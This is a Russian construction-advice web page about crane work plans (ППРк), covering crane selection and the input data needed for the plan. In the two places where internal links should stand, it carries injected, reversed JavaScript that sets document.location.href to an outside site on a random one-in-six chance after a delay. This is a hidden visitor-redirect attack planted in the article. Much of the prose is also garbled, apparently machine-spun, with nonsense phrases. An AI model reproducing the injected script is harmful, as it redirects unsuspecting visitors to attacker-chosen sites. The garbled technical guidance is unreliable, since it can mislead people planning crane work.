Добавить в закладки

ПРОЕКТ ПРОИЗВОДСТВА РАБОТ КРАНАМИ ППР КРАНАМИ

Подготовить исполнительную документацию во время строительства — это не только работа инженера ПОО, но и, как правило, работа производителя, руководителя участка, оценщика и даже поставщика.  Если у вас возникнут трудности или вопросы, вы можете прочитать  статьи в социальных сетях или запросить бесплатную консультацию. Архитектура — важная часть нашего мира. Давайте вместе строить и своевременно и грамотно оформляем tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to.ru/form-gur/zhurnal-proizvodstva-zemlyanyx-rabot-snip/»>журнал земляных работ.

При выборе крана важно проверить, соответствует ли высота подъема его крюка параметрам, необходимым для строительства конкретного объекта. Для этого необходимо принять во внимание необходимость выставления определенных конструкций на высшие баллы, а также принять во внимание длину строп, а также размер, вес и форму сборных компонентов, которые необходимо установить.

Расшифровка концепции ППРк 

ППРк (проект по производству дешифрованного крана) — эта концепция исчезла с введением новых федеральных норм и правил на опасных производственных объектах, использующих подъемные конструкции. Теперь это ППР с использованием ПС-документа tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to.ru/proekt-proizvodstva-rabot/proekt-proizvodstva-rabot-kranami-pprk/»>проект производства работ кранами, отражающего требования безопасности и организации работы кранов и агентств.

Этот документ одобрен владельцем и разработчиком и одобрен операционным подразделением. Должен работать с ответственным лицом на рабочем месте, и ответственное лицо должно ознакомить с ним весь соответствующий персонал.

Чтобы проверить соответствие крана на соответствие требованиям, используются устанавливаемые конструктивные чертежи. После этого определите положение крана и рассчитайте на этой основе максимальную высоту подъема и максимальный требуемый диапазон стрелы.

Что касается грузоподъемности, то при выборе крана по этому параметру следует учитывать массу самого тяжелого груза, который необходимо поднять, и вес грузовой арматуры:

  • траверсов,
  • грейферов,
  • стропов и пр.

Исходные данные для составления ППР с применением ПС

В случае необходимости внесения изменений в ОРП он согласовывается экспертной комиссией и подтверждается подписью эксперта. Кроме того, только разработчик может исправить документ. Для начала составления документа вам потребуются исходные данные, в том числе:

Механизированные средства, материалы и конструкции, рекомендованные подрядчиком;
Обеспечение ресурсов и коммуникаций для строительной площадки;
Информация о поставщике, а также о сроках и плане доставки всех ресурсов на строительную площадку;
В случае реконструкции объектов — информация об условиях работы на их территории;
Решения по вариантам структурно-пространственного планирования;
Принципиальная схема технологического процесса;
Гарантия.

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Автор: admin
Опубликовано: 30.07.2021





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: